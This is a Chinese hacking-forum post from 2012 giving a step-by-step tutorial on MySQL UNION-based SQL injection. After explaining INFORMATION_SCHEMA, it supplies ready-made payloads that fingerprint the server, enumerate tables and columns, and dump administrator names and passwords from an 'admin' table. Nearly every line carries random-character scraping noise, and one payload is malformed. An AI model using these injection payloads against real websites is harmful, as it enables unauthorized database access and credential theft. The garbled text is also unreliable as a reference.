找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2027|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法
+ K- ^3 ~6 {# h9 e, {( B8 O" B  y5 m* t" ?: j+ d9 R3 q8 z
学习盲注前先了解下 IFORMATION_SCHEMA 库5 b# g  z" l5 T0 \
6 r" R8 P  [1 G- e: b$ S9 Y
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有- B9 W; m2 @- v. d. b3 g' q" e( U
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。8 d4 R  O# s" c' m2 ~
1.得到所有数据库名:
) w3 E5 R; U5 J" ^/ l8 z3 N|SCHEMATA ->存储数据库名的表2 i% d7 ]/ @4 z5 n4 r! s
|---字段:SCHEMA_NAME ->数据库名称/ M6 M1 [! a8 O0 v

/ O6 W5 b9 S. }# z- ^2 y6 R/ ]|TABLES ->存储表名
2 b4 Z8 y1 e9 O|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
  T2 O" w3 j5 m! s0 ?% D' z|---字段:TABLE_NAME ->存储表的表名
7 N& e: ~5 d! m
8 N0 z) p) e7 z/ a. l. s9 ~|COLUMNS ->存储的字段名表+ ^, H' y* d4 E; ?& E
|---字段:TABLE_SCHEMA ->该字段所属数据库名8 P4 }& Z% C9 q% C! b) w/ U+ A+ k
|---字段:TABLE_NAME ->存储所属表的名称
( @8 V/ _. C1 y8 k$ n, t0 a
/ @( D$ B/ v3 f* P|---字段:COLUMN_NAME ->该字段的名称4 [/ X# f+ x( ]* i

, }- f4 F( _( Y ! e2 j) u" \8 C$ _0 s) j

2 U3 k% |0 j, P4 ]- Z$ a###########################################################################+ j6 L3 S+ ^9 ^8 ^9 m) R. s- i
# N  z* P* O: Y
0x001 获取系统信息:. c; [- N6 u; k) s
% U" d- _5 R' V( w% Y) |% U
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*+ l+ }; Y$ d  o4 v4 u6 O' \
" A1 Y% A0 K+ S6 k3 l4 x
/*# i2 E0 Q* E: E4 v3 o& }' W; q6 c1 a( @

! N2 @9 o. j* U, g@@global.version_compile_os 获取系统版本0 [( r3 u% C- ^0 |2 X
' G2 r$ a+ @1 M7 g# K1 D
@@datadir 数据库路径5 F$ A! p0 I- |/ Y" s
database() 当前数据库名称
: {: o/ o0 ], ^* G& @. t7 d: b0x3c62723e 换行HEX值
& _, K( z* s( S8 ~$ a& K! \% n6 f, u4 {; {- M8 w( Q6 ?& Z
*/1 ~  h/ A) @4 d% b  }
& M* M3 x; _8 s* {( p% O/ n: q, i; w
9 ]. D  v4 x! F  r

0 Z+ r  M# A" k" u, p# F* G* @1 u######################################################################) ?8 r7 O) i+ q  s( g8 }) r# R) X
* V. _% Q) J  k5 W! w
0x002 获取表名
0 G5 s0 o# L: z# }0 F9 y( j* s
9 [: I( U. i  R( }' _union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
- b4 h, \. B2 c. f, I9 R8 M- ]: m

8 p* S7 _3 B' w1 R/ {  }0 b6 o+ `* W/ O  x5 N
/*
$ ~0 f- k- i! d" C6 P9 z3 b
5 x+ H3 `1 ]6 S* p- [; F0x67617264656e 为当前数据库名6 W8 x/ W9 T* z

9 Y0 q) J5 a% \0 I8 kgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
& T: }. L8 f8 j) d/ b8 E, b5 |; O" W: Q3 {* V
*/
; h! `5 y3 }' A7 V5 u6 B, B; x# V# d9 I' e3 J) S
######################################################################
$ E9 y; k0 P4 L) }4 D
" X/ ]: `( H3 G4 q# \& s
9 h3 G3 B/ }6 v6 `
' [) `+ t( |0 E0x003 获取字段, _! G, P4 C! z

' v* i& }; j: bunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
  Q0 F/ F$ X# V; S8 \4 Q; \8 B1 J+ w, G
/*, ]& \0 V9 F1 N1 I7 A9 E2 _. g1 j5 _; n+ ~+ m

. A: E- m' N1 E- c+ P$ tgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段# R, c" I% w1 P- T% |

1 O: e  _7 U1 Y$ m. l# M0x61646d696e ->选择一个表; a/ Y+ ~" U. [7 h7 w
7 s' c' R# x' X; m
0x67617264656e ->数据库名- ~0 m3 K' K. U+ i3 x" T9 K
# @; H8 _' }" b: S4 |
*/; O$ j) R9 w8 Y0 y1 A* ~5 K
/ T5 p$ D: D6 D: T: Q) |2 [+ F
#####################################################################
: H  _' E' w; Y  z0 ^5 C& _4 ~
: f# B5 r4 c1 r& s* f/ h# } * L, L9 R2 \: A2 K5 Y4 Z0 `1 J9 d

2 v& [6 M  s; W5 T) |0x004 获取数据
. }$ l; ?% j1 u5 I  j5 W3 x! y9 ^4 x' w- Z4 X) u
union select 1,2,3  n$ S+ P4 p" d1 b
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
& V. {# p% }6 v9 u0 n
' [8 d% S: _  m+ v2 @union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin) \" E8 b9 C1 i6 r! N
% U. _1 i; ^7 b. p! l5 H
! E" B4 c- [( ~; B9 i/ A' ^% g

( v0 m. B; P) h) l: _! L/*
9 `* B* q' D1 F8 m4 O2 D( z5 q4 L  q
/ z5 I0 v" ^( P3 R+ J0x3c62723e 换行符号HEX编码7 Q! Z/ v: p7 P
* P& m" `. e) C- E
group_concat 同时获得该字段所有数据
% H. O3 b. o8 n2 i
- c2 b7 h6 L+ A. I' }*/. {* X0 F& Z: C9 Y+ k- A
4 z1 [& z' y5 x7 w# T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表